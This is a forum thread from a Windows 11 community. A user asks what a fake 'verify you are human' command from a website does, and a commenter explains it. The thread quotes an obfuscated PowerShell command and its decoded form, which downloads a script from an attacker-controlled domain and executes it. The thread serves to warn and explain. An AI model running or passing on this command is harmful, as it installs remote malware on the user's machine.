Windows 11

1081 readers

1 users here now

Welcome to the community for Windows 11, Microsoft's latest computer operating system.

Rules:

Do not promote pirated content or grey market keys.
Be civil. No rude, offensive, or hateful posts/comments.

founded 2 years ago

MODERATORS

[email protected]

What does this command do that this website wants me to "verify" myself by running in the run window? (sh.itjust.works)

submitted 3 weeks ago* (last edited 3 weeks ago) by [email protected] to c/[email protected]

20 comments fedilink hide all child comments

Yeah don't put this in but can anyone give me an idea of what they were trying to do? the website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real pc verification screen to try to get me to put this in Run

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

you are viewing a single comment's thread
view the rest of the comments

[–] [email protected] 21 points 3 weeks ago

The base 64 encoded payload is:
$site = Invoke-RestMethod 'https://mastraw.top/me/day'; iEx $site

it would download malware and install it on your machine